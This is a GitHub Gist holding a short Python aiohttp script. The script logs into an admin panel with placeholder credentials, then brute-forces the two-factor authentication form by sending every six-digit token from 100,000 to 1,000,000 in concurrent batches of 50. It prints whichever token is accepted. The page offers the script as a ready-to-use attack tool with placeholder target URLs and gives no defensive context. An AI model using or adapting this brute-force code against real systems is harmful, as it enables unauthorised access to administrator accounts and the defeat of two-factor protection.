Created
December 1, 2021 20:32
-
-
Save tonybaloney/2cfc945e2a0d64c5d3572057e02fee81 to your computer and use it in GitHub Desktop.
Brute force a admin login and 2FA endpoint with token ranges 100,000 - 1,000,000
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import aiohttp | |
| from itertools import islice, chain | |
| LOGIN_FORM = 'http://asd.sdfsdf/admin' | |
| LOGIN_URL = 'http://asd.fsdfsdf/admin' | |
| TWOFA_FORM = 'http://asda.asdas/doAdminTwoFactor.action' | |
| INVALID_MESSAGE = 'Invalid token, please try again' | |
| def batch(iterable, size): | |
| sourceiter = iter(iterable) | |
| while True: | |
| batchiter = islice(sourceiter, size) | |
| yield chain([batchiter.__next__()], batchiter) | |
| async def fetch(client, tok): | |
| async with client.post(TWOFA_FORM, data=f'token={tok}'.encode(), headers={"Content-Type": "application/x-www-form-urlencoded"}) as resp: | |
| assert resp.status == 200 | |
| if INVALID_MESSAGE not in await resp.text(): | |
| print("Token is {}".format(tok)) | |
| exit() | |
| else: | |
| print(f".", end="") | |
| async def main(): | |
| async with aiohttp.ClientSession() as client: | |
| initial = await client.get(LOGIN_FORM) | |
| assert initial.status == 200 | |
| # First Login URL (optional) | |
| await client.post(LOGIN_URL, headers={"Content-Type": "application/x-www-form-urlencoded"}, data=b'username=user&password=password') #replace with known creds | |
| for batchiter in batch(range(100_000, 1_000_000), 50): | |
| await asyncio.gather(*[ | |
| asyncio.ensure_future(fetch(client, tok)) | |
| for tok in batchiter | |
| ]) | |
| loop = asyncio.get_event_loop() | |
| loop.run_until_complete(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment